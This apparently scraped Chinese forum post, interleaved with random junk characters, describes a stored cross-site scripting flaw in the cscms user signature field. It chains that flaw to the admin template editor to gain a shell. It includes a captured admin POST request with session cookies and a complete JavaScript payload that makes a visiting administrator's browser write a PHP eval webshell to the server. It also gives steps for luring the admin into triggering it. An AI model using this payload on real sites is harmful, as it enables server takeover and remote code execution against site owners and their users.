|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
9 v4 ]2 F9 X: d6 \官网已经修补了,所以重新下了源码
( Q5 r6 g# G2 z! z0 n因为 后台登入 还需要认证码 所以 注入就没看了。
+ T! Q1 `* W( u' A8 n存在 xss6 S M% W F7 q+ L9 e
漏洞文件 user/member/skin_edit.php
, N1 Y! w" ]4 X4 F! [& I$ z4 f本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:" z3 j1 X: m" D
- U7 ~: K/ H2 [0 Z+ d I
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
( P; V+ b( _0 F! j# C
2 ~* J: V& W l6 v/ L/ S: |& F</textarea></td></tr>
$ h6 w' c d0 ~( _* H) @) Y
0 z! v4 i: N9 i T. a' N2 i user/do.php ' i, ]7 `: j) [6 x6 V# _% w/ e2 w
2 H$ ?5 L( o2 G" a" V' ]$ [
; A2 d1 j8 b4 ]3 ?( _0 ?( V
if($op=='zl'){ //资料" W! T) \. x1 Z
) W$ H2 O) e/ Y0 b
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
P3 c: u! R2 j5 w8 f1 Z0 {8 ]# S' } exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
: ? x0 Z$ ]0 v: I( n& f3 q 5 O) o7 f, Q! i: s( ]
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
8 a" g" j8 d" F4 [
0 n4 h$ Z( h6 P* ]2 x( u CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'5 L' `3 b& G6 r3 e! Y
where CS_Name='".$cscms_name."'";
$ j# _& S0 A8 F* W" n
& A, \8 D2 `% {2 W5 l# {5 [ if($db->query($sql)){. D- n1 J- d U: x& r, O2 Z1 |
; W5 W$ B8 H# u' d6 h
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));& c8 A2 c0 u9 N \7 o* m
2 T0 H% f+ ^3 G: K
}else{
" {9 w3 r7 a: p4 B3 G% K2 V) H7 V1 Q / \* _* c6 C' t
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));8 j |, t6 e4 i a u; H( _. B
* D& Q, ?7 Y5 l5 T; D) s" z
}+ z( l9 v8 m7 `( e% @
" G7 B( Y1 L6 h2 e
1 y# x2 R9 C5 O+ o5 T没有 过滤导致xss产生。( s' f" y( p, j, W, I) r
后台 看了下 很奇葩的是可以写任意格式文件。。5 L: n8 i Q8 |# v
抓包。。
; O* e2 [ |; c* e6 B' E9 f) a! u k+ r7 d" d% \
) B, |! s5 d* j# \) s. q本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.13 J2 n9 j' } Z: o' }& Z' q( r4 @
, D' t0 M5 w" i+ l8 d" }' c
Accept: text/html, application/xhtml+xml, */*( R3 C( R" F0 r
6 B+ ?" B0 B$ P) Y9 _Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
1 X9 t; E% w) j9 D
! V+ r9 O9 x' }Accept-Language: zh-CN" `5 Y- B' Z" @5 V: g
8 h/ z" {# I9 ]* n# c3 e& d/ G
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)! D+ ^- r: n! K+ R4 F
# n9 K6 v! o' K3 T, s/ x
Content-Type: application/x-www-form-urlencoded
4 M9 M% s4 h/ ]/ B# m! h v " p5 L' s, [$ w* M M [9 d: G2 z
Accept-Encoding: gzip, deflate
0 X. k/ G3 S+ R! ~; w
- x4 I; `7 ^6 I6 s, _) O/ h4 w7 xHost: 127.0.0.1
9 N+ b$ i( H! z, l 8 F4 B( d% x+ z; b% l/ X) ~
Content-Length: 38
" B5 Y: x0 e6 _1 k% y4 Y e! h5 H2 H: Z- l9 q
DNT: 1' H, Q( Q2 h, e( z7 m
, P. D6 l: V! a; p% B
Connection: Keep-Alive
6 @- ?1 [+ e; n7 _" a8 \ # J+ i0 I2 s# S# W& i; C0 p1 Q
Cache-Control: no-cache7 G& _: G4 @- G- e5 y
7 r7 h! x, f; x1 X) k2 W, |Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655942 H8 [& Q$ l& A3 J" z% ]
7 T8 R) L- y; C9 v/ T
- ^/ y q5 `$ }name=aaa.php&content=%3Cs%3E%3Ca%25%3E$ U0 |( s9 ]6 X a& H
( Q- e6 Q4 B7 s' a& R0 ?
" _2 k3 q/ N: B a; U4 H
. L8 w* Z5 @) W$ ^! S9 `( ]& m于是 构造js如下。0 `, g, A8 w$ E% l6 C
/ w3 ]; \" {; x: V8 Y( d
本帖隐藏的内容<script> 0 X/ l7 c* R) G7 Z. Y5 k% j5 e Q; C/ t
thisTHost = top.location.hostname;. u0 u1 t t& v1 u% M2 }
9 Z1 l+ T' E S6 o( g! MthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";/ ?) K) f% @ A; B2 _
; [; y2 s4 k0 R3 N9 f) l9 {
function PostSubmit(url, data, msg) {
) e3 f; @; l6 |" O var postUrl = url;- M) l d+ z) s. o9 s
2 M$ X& E6 R( w5 g var postData = data; ]1 D! f. d1 b4 ?/ r
var msgData = msg; " K$ E# F, M9 {
var ExportForm = document.createElement("FORM");
5 o. c* R4 R: G1 C e document.body.appendChild(ExportForm);
0 { U7 a7 v0 A& `$ n ExportForm.method = "POST";
: h$ v' g, E5 \. w, | var newElement = document.createElement("input");
( G0 u: k' K) r* r! Z newElement.setAttribute("name", "name");
7 U4 Q" C7 V, S9 r& K3 i newElement.setAttribute("type", "hidden");
$ r7 q' |9 T: [, b e; K var newElement2 = document.createElement("input");
8 ]- X4 W) [8 U. m) b2 g newElement2.setAttribute("name", "content");
3 H1 O8 s, i& |/ r1 q newElement2.setAttribute("type", "hidden"); 1 a5 G" K$ k) |' j. n" M
ExportForm.appendChild(newElement); " F' c1 V( Z6 |3 f: j E( }2 X. @
ExportForm.appendChild(newElement2);
6 y2 A6 b: c8 s* c& t newElement.value = postData;
( h+ x- h" |6 ~0 C) } newElement2.value = msgData; 0 j& [' W% [- J* C
ExportForm.action = postUrl; - y3 `2 r7 a; \4 Z
ExportForm.submit(); 9 f; G3 A2 I9 i2 S
};
* Z+ r- ^6 f) \$ u4 D6 P * K" r$ W6 `* ^2 f3 W
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");$ G; K/ i x' k* h
3 N* A* X: o( B4 C) ?: n @
</script>
1 ~7 b$ u3 L" y1 b3 }6 Y
( N2 A3 ?" X, {
+ s6 |2 b1 \1 a2 U1 H6 z6 R0 G( Z* A& @+ r! b. I( }& r) j6 l
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入! j3 Z6 c/ r) X6 ~1 b6 i
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)% b. C: ?, h% f* l2 U5 Z
就会 在 skins\index\html\目录下生成 roker.php 一句话。 | 9 g- x$ H, A& Z9 U& q3 E
|
|